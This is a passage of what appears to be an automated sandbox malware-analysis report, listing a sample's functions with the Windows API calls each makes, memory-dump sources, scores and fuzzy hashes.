                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: f8f2a2a1bf3e390365aba925a85c0cc64778e6d402bc24b16d8b396610e0b156
                                                                                            • Instruction ID: 83371bc7e15b24e424f608ce5a3e19499a900dc92025b26b307e9894a4faca53
                                                                                            • Opcode Fuzzy Hash: f8f2a2a1bf3e390365aba925a85c0cc64778e6d402bc24b16d8b396610e0b156
                                                                                            • Instruction Fuzzy Hash: 55216D6140D3C0AFD7138B259C54A62BFB4EF57620F0980DBD9848F2A3D2696808D7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,F7D786C6,00000000,00000000,00000000,00000000), ref: 0074AFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 28e99c314eb879a86bde9c9f70874b406040b9d4ef5e7b733130f5216e4d57f9
                                                                                            • Instruction ID: ea2edcb47942ff8bcec85fd2076f058ed3b5cf1679a2f75b409c4f4471a55ebb
                                                                                            • Opcode Fuzzy Hash: 28e99c314eb879a86bde9c9f70874b406040b9d4ef5e7b733130f5216e4d57f9
                                                                                            • Instruction Fuzzy Hash: 0411C471500300EFEB21DF55DC45BA6FBA8EF44720F14846AED059A151D774E9088BB5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F0886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,F7D786C6,00000000,00000000,00000000,00000000), ref: 021F08E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 5bbc6d14b19f40b5be63c82d23023a55aaf3d5b8c9b06275c006603c40e0dbb7
                                                                                            • Instruction ID: 24372fb426ff78ef789bab0e1b8863184fecec78dfd15ebc187c45180c130afc
                                                                                            • Opcode Fuzzy Hash: 5bbc6d14b19f40b5be63c82d23023a55aaf3d5b8c9b06275c006603c40e0dbb7
                                                                                            • Instruction Fuzzy Hash: 9111C172500300EFFB21DF51DC45FA6FBA8EF18720F14856AEE499A246D771A504CBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0074BA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: fbd89e49e897b339c94a14bba546c9df35cc4f8ac1d2849d4acef160d9516201
                                                                                            • Instruction ID: d459b60031ba0bdcebd83acf1a75f5fa092c8796ba09d8e91d68b670cbe81869
                                                                                            • Opcode Fuzzy Hash: fbd89e49e897b339c94a14bba546c9df35cc4f8ac1d2849d4acef160d9516201
                                                                                            • Instruction Fuzzy Hash: 0D118C72508380AFDB22CF65CC44A52FFF4EF05210F08849AEA898B662D375E818DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F12D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 021F132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: 1a96e03116731ded765174ce101f9e83f40c8c5a3b97bcf555af718e24c5d029
                                                                                            • Instruction ID: 9302b59c42050e66da663004af46d248f195aebe081386868658f80baf39361f
                                                                                            • Opcode Fuzzy Hash: 1a96e03116731ded765174ce101f9e83f40c8c5a3b97bcf555af718e24c5d029
                                                                                            • Instruction Fuzzy Hash: 6B119171509384AFDB118F25DC45B96FFA4EF06220F0984EFED498B262D375A808CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(?), ref: 0074A39C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 1729f55d543f9a88c006633e6d66fa12b7c83c39bddfc2ec4986434dfc97c220
                                                                                            • Instruction ID: 3a80e9950caf9a5ae1fa36e72ebfbfe7ed9328231906f0680d5e8c3399b057fe
                                                                                            • Opcode Fuzzy Hash: 1729f55d543f9a88c006633e6d66fa12b7c83c39bddfc2ec4986434dfc97c220
                                                                                            • Instruction Fuzzy Hash: 43116D714093C0AFEB128F15DC54A62BFB4DF47654F0880CAEDC44B263D265A808DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F05E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 021F0640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: b7f8dbf060aa03e7195c16dd681619b2606e3aef5718fb5d953602320f6b9031
                                                                                            • Instruction ID: 46147526b8ddc27cac8b32553a42806e71dc797db011ed6f0580f0388159d2af
                                                                                            • Opcode Fuzzy Hash: b7f8dbf060aa03e7195c16dd681619b2606e3aef5718fb5d953602320f6b9031
                                                                                            • Instruction Fuzzy Hash: 2411C2755093C09FDB128B15DC95B52FFB4DF46260F0880DBED858B663D265A908CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 021F099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: 86eeb9c60c231490304a253f1f7af5dc0e1606621944537676a5a8c879ffedc2
                                                                                            • Instruction ID: 2ce52f3c3ee96c94abc9e03ebb025c510b2c8c57ab0752d947ec5042af562caa
                                                                                            • Opcode Fuzzy Hash: 86eeb9c60c231490304a253f1f7af5dc0e1606621944537676a5a8c879ffedc2
                                                                                            • Instruction Fuzzy Hash: 9A1190715097C09FE7128B25DC55B92FFA4EF07324F09C0DADD984B163D265A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0074AB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: cc0bbf6b8f3dea13d3fce38577fb876e1647ad6c9a1fe5d5fa99db2169404bb3
                                                                                            • Instruction ID: 522c13c88ab9dcafc08e131b7190c9d44cf79de1d3eac8b282ba3ebe644f92a1
                                                                                            • Opcode Fuzzy Hash: cc0bbf6b8f3dea13d3fce38577fb876e1647ad6c9a1fe5d5fa99db2169404bb3
                                                                                            • Instruction Fuzzy Hash: 3F115EB1644300AFEB20DF25DC85B56FBD8EF14761F18C46AED09CB641D774E804CA62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 0074AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 204d9dcdbfb689802c00af795a59ef2c240fe4677adde0661ba551db0f13421c
                                                                                            • Instruction ID: 8a2991145e0d993c08509f0ce774bb8df2e54c982609dc992428b5da3ced3002
                                                                                            • Opcode Fuzzy Hash: 204d9dcdbfb689802c00af795a59ef2c240fe4677adde0661ba551db0f13421c
                                                                                            • Instruction Fuzzy Hash: FE11C17550D7C09FD7128B11DC85A91BFA4EF13320F0980DBDD848F163D268A909C762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F07C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,F7D786C6,00000000,00000000,00000000,00000000), ref: 021F0819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: bc7e3cfbf701c0cdb5c524965abb6f746a9b6d643dc141cf39617c36fcc69c2f
                                                                                            • Instruction ID: 40b8fb01d30811ae86022f0345edb6783ee88e616dc3533770953868778981c9
                                                                                            • Opcode Fuzzy Hash: bc7e3cfbf701c0cdb5c524965abb6f746a9b6d643dc141cf39617c36fcc69c2f
                                                                                            • Instruction Fuzzy Hash: 7F01C075900304EFFB209F01DC85BA6FB98DF04720F14C0AAEE099A246D774A904CAA6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F13AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: afca5e2265169aee6a877f542799c8b804c8813fe2f84e895b1fc7453342af99
                                                                                            • Instruction ID: 8848d55571b517b5ef585a48258b4ea8486ab63e3fa5d38645117bf9bfe98239
                                                                                            • Opcode Fuzzy Hash: afca5e2265169aee6a877f542799c8b804c8813fe2f84e895b1fc7453342af99
                                                                                            • Instruction Fuzzy Hash: 7B11AD76500700EFEB60DF56DC85B66FBA4EF04220F08C4AEEE598B652D371E418DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 0074ABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: da11583bfa0925732b1bb7d5f686ee35a5284fe8db8545d1fa97a84e5e246ed9
                                                                                            • Instruction ID: 64c08a3c22be6e05080c335a6608075dafbd7881586ab2fd8bf19bbbed327edf
                                                                                            • Opcode Fuzzy Hash: da11583bfa0925732b1bb7d5f686ee35a5284fe8db8545d1fa97a84e5e246ed9
                                                                                            • Instruction Fuzzy Hash: E41182B5509380AFDB11CF55DC85B92FFA4EF52324F0984ABDD488F153D275A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0074BA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 39d915b921ab8db81e44f4c3061f9e600b767d771c311d900edffd8e53de093c
                                                                                            • Instruction ID: 4c929d63a17eb6587bddf4388ae413ae66dcb460515f0c61ee712248e346a535
                                                                                            • Opcode Fuzzy Hash: 39d915b921ab8db81e44f4c3061f9e600b767d771c311d900edffd8e53de093c
                                                                                            • Instruction Fuzzy Hash: 0A118E72504700DFDB20CF55DC44B62FBE4EF18310F08C4AADE898A612D375E814DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F0196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 021F01D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: eb128d40cbf4a945eaa9e1ac0d0cbdcc80524c17063024ecf995ea8eabc99425
                                                                                            • Instruction ID: 5f9c9529b73b75119fc1ac9fe40d6162a60264431c794dd292fe0d4416bfcd49
                                                                                            • Opcode Fuzzy Hash: eb128d40cbf4a945eaa9e1ac0d0cbdcc80524c17063024ecf995ea8eabc99425
                                                                                            • Instruction Fuzzy Hash: F901BC71644704DFEB50DF2ADC857A6FBA8EF04220F08C4AADD19CB646E774E804CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 021F109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 92cccfab6bd4e53755f3825bf812371b2751f2666fe8073789ee30bc1850000a
                                                                                            • Instruction ID: 2c300856a4bfb1d60a70137ce8f1c350818d82f531df2e14a8bca025b0ff557d
                                                                                            • Opcode Fuzzy Hash: 92cccfab6bd4e53755f3825bf812371b2751f2666fe8073789ee30bc1850000a
                                                                                            • Instruction Fuzzy Hash: D3017171900600ABE310DF16DC46B66FBA8FF84B60F14816AED089B741D235B915CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0074A23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: 0db2f5632453686315ba922d633aa6c0603b23c4f556c985265c322c15cf73a2
                                                                                            • Instruction ID: 4e0f9bed42ee7e72f21f25c742fed5525d99df2828b3443987db23f02cabb26a
                                                                                            • Opcode Fuzzy Hash: 0db2f5632453686315ba922d633aa6c0603b23c4f556c985265c322c15cf73a2
                                                                                            • Instruction Fuzzy Hash: 52018471900600AFE710DF16DC46B66FBA8FF84B60F14816AED089B741D235F915CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F12FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 021F132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: 9210e5f79990092d803cdb8db7e0453cf89f218486c13498c88b0cb22dae8cbd
                                                                                            • Instruction ID: 63fd9cc56fe4093d60aca74de2caa0b6259e39073adb566c22cfcf6bea06b120
                                                                                            • Opcode Fuzzy Hash: 9210e5f79990092d803cdb8db7e0453cf89f218486c13498c88b0cb22dae8cbd
                                                                                            • Instruction Fuzzy Hash: EE01DF75904340EFEF60DF15DC85BAAFBA4EF04620F08C4AADD198B652D375A404CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleMode
                                                                                            • String ID:
                                                                                            • API String ID: 4145635619-0
                                                                                            • Opcode ID: ec435016cfe2abf39e98cd3248ed19622cd2d625e44ba211fdb99c7af8d4e8d5
                                                                                            • Instruction ID: 924315af81e092e03caf1f93c316c6310074bb355c8f136aa6d88a49a3a8be34
                                                                                            • Opcode Fuzzy Hash: ec435016cfe2abf39e98cd3248ed19622cd2d625e44ba211fdb99c7af8d4e8d5
                                                                                            • Instruction Fuzzy Hash: B101DFB1900240DFEB20CF15DC857A5FBA4EF04720F18C4ABDD498B256D379E804CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F04B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 021F0502
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: f0817cdc5fd60ac666404782bac2277838245d36befe3422da8968517a9f3dff
                                                                                            • Instruction ID: 053b39992ab3148acf5dd6f963f4c2fb19efa089e7ef58ec268841d96fac77ae
                                                                                            • Opcode Fuzzy Hash: f0817cdc5fd60ac666404782bac2277838245d36befe3422da8968517a9f3dff
                                                                                            • Instruction Fuzzy Hash: 00016271900601ABD310DF16DC46B26FBA4FF88B20F14815AED085B741D275F915CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F0F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 021F0FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: 8af4671e1a896688bfafed42bedbf689ba71fe30848cf9eabf0735bba9912103
                                                                                            • Instruction ID: 17f1b34a8773688066fff9369aad1054bb4fed791a5fd00b4f0ada803f592f9c
                                                                                            • Opcode Fuzzy Hash: 8af4671e1a896688bfafed42bedbf689ba71fe30848cf9eabf0735bba9912103
                                                                                            • Instruction Fuzzy Hash: 0101DF71500300DFEB60DF15DC85B66FB94EF04620F08C4AADD188F20AD374E408CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0074A94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: 14636a4d9df745a01c8557d04600a56e3ade3478eb5c92b2de0ef35cc52fa78b
                                                                                            • Instruction ID: 6440943bec29d0fdd890ee7bdb83b159c795fd9edb62d9b3926ae8369ac56192
                                                                                            • Opcode Fuzzy Hash: 14636a4d9df745a01c8557d04600a56e3ade3478eb5c92b2de0ef35cc52fa78b
                                                                                            • Instruction Fuzzy Hash: 8F016271900601ABD310DF16DC46B26FBA4FF88B20F14815AED085B741D275F915CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 021F0640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: a43578dd79480698839697432df53b0427b2c5d40e0e1a3e41f10f9bdbdd860b
                                                                                            • Instruction ID: 7189141fe489d653a622cbd8f8d826754d4ac3fd922a083fcbd524fe73c1833b
                                                                                            • Opcode Fuzzy Hash: a43578dd79480698839697432df53b0427b2c5d40e0e1a3e41f10f9bdbdd860b
                                                                                            • Instruction Fuzzy Hash: 8F01FF75600700DFEB608F15DC85765FBA0EF49730F08C0AADE298B756D774E808CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 0074ABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: c90d0728dacb110d378416338cea041f2c85d942272d38c32161e9776dc0d40c
                                                                                            • Instruction ID: 5195a577f832e7184e04241dc3f8d9cd26b58946f2bcc0e36bed801857dbe61a
                                                                                            • Opcode Fuzzy Hash: c90d0728dacb110d378416338cea041f2c85d942272d38c32161e9776dc0d40c
                                                                                            • Instruction Fuzzy Hash: F001DC71404340EFEB10DF55D889BA2FBA4EF10320F58C4ABDD088F202D378A804CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F1116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 021F1148
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: ca48110cfc8470bb6ac1e1d93541d879c6d94140b46d2807746f8dfcced17814
                                                                                            • Instruction ID: 7b91f2981617ba8f4bbaa9ff5cf94e4226e1e1a542931c127e01cb4c4cce1bee
                                                                                            • Opcode Fuzzy Hash: ca48110cfc8470bb6ac1e1d93541d879c6d94140b46d2807746f8dfcced17814
                                                                                            • Instruction Fuzzy Hash: C8F0F934908740EFEB60CF15D889766FBA0EF01A21F08C09ACE184B312C379A448CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 021F099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: f41f757c60deea66e86ab9db35af3ce493b20e9b100d9c877505dfb0a900510c
                                                                                            • Instruction ID: ef4139388fa3b9bd6efa7ac8fad06760b5dffc8638d64394b8c73a6fb9361778
                                                                                            • Opcode Fuzzy Hash: f41f757c60deea66e86ab9db35af3ce493b20e9b100d9c877505dfb0a900510c
                                                                                            • Instruction Fuzzy Hash: 7CF0AF35904740DFEB609F05D885765FBA0EF18721F48C09ADE594B31AE375A548CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(?), ref: 0074A39C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 807f39424c3fb762ea7bbd382519426045e6f7c5703a79bda92df63b421020ae
                                                                                            • Instruction ID: 40947c7476dfbb13493eb7b566c6d1c3c884e6b3bd3e0a7d1535d476953749d8
                                                                                            • Opcode Fuzzy Hash: 807f39424c3fb762ea7bbd382519426045e6f7c5703a79bda92df63b421020ae
                                                                                            • Instruction Fuzzy Hash: EFF0CD35904740EFEB20DF06D889B65FFA0EF05721F18C09ADD094B352E379E808DAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 0074AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 0ff31d570c7d6612c4d8fcad3b5859aab00683be812c2b7b72993f4d767be575
                                                                                            • Instruction ID: c241b43fbd0efd0ddc4ac35d84fb98ca76043d4f1529999c72c413ab595c0fe2
                                                                                            • Opcode Fuzzy Hash: 0ff31d570c7d6612c4d8fcad3b5859aab00683be812c2b7b72993f4d767be575
                                                                                            • Instruction Fuzzy Hash: D2F0CD31644740EFEB10DF05D989B61FBA4EF15721F58C49ADD094B252D378A908CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 0074A9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 2f11b639db8f9cd4440aebe9456e13e08272f128bb9eefc9e283e19c2d3d0734
